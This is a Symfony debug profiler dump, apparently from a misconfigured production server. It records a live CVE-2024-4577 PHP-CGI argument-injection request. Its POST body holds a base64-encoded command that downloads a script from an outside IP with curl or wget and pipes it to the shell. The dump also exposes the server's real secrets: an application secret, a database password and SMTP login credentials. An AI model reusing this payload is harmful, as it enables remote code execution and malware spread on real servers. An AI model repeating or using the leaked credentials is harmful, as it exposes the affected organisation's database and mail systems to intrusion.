n/a
Request
GET Parameters
Key | Value |
---|---|
p | "hello.world" |
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_remove_csp_headers | true |
_stopwatch_token | "2b1352" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
authorization | "" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "157.100.114.212:443" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=UTF-8" |
date | "Sat, 16 Nov 2024 12:45:46 GMT" |
x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2F157.100.114.212%2Fhello.world%22" |
x-debug-exception-file | "%2Fdata%2Fproduccion%2Fintegral%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:128" |
x-debug-token | "d69390" |
x-debug-token-link | "https://157.100.114.212/_profiler/f4a9cc" |
x-previous-debug-token | "f4a9cc" |
x-robots-tag | "noindex" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "c4d61b67844c8a03b086ad08643ebb84" |
DATABASE_URL | "postgresql://postgres:@integral2024@200.6.25.30:5432/integral_produccion" |
LOCK_DSN | "semaphore" |
MAILER_DSN | "smtp://dirmov1@bfound.ec:Molero1401Dlrowcp2301@darnell.nocdirect.com:465" |
MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
ws_dinardap | "http://interoperabilidad.dinardap.gob.ec:7979/interoperador?wsdl" |
ws_dinardap_v2 | "http://interoperabilidad.dinardap.gob.ec/interoperador-v2?wsdl" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/data/produccion/integral/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/data/produccion/integral/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTPS | "on" |
HTTP_ACCEPT | "*/*" |
HTTP_AUTHORIZATION | "" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "157.100.114.212:443" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_HTTPS | "on" |
REDIRECT_HTTP_AUTHORIZATION | "" |
REDIRECT_QUERY_STRING | "p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_SCRIPT_URI | "https://157.100.114.212/hello.world" |
REDIRECT_SCRIPT_URL | "/hello.world" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "47.250.41.155" |
REMOTE_PORT | "42196" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "https" |
REQUEST_TIME | 1731761146 |
REQUEST_TIME_FLOAT | 1731761146.7849 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/data/produccion/integral/public/index.php" |
SCRIPT_NAME | "/index.php" |
SCRIPT_URI | "https://157.100.114.212/hello.world" |
SCRIPT_URL | "/hello.world" |
SERVER_ADDR | "200.6.25.29" |
SERVER_ADMIN | "[no address given]" |
SERVER_NAME | "157.100.114.212" |
SERVER_PORT | "443" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.52 (Ubuntu) Server at 157.100.114.212 Port 443</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.52 (Ubuntu)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,MESSENGER_TRANSPORT_DSN,DATABASE_URL,MAILER_DSN,LOCK_DSN,ws_dinardap,ws_dinardap_v2" |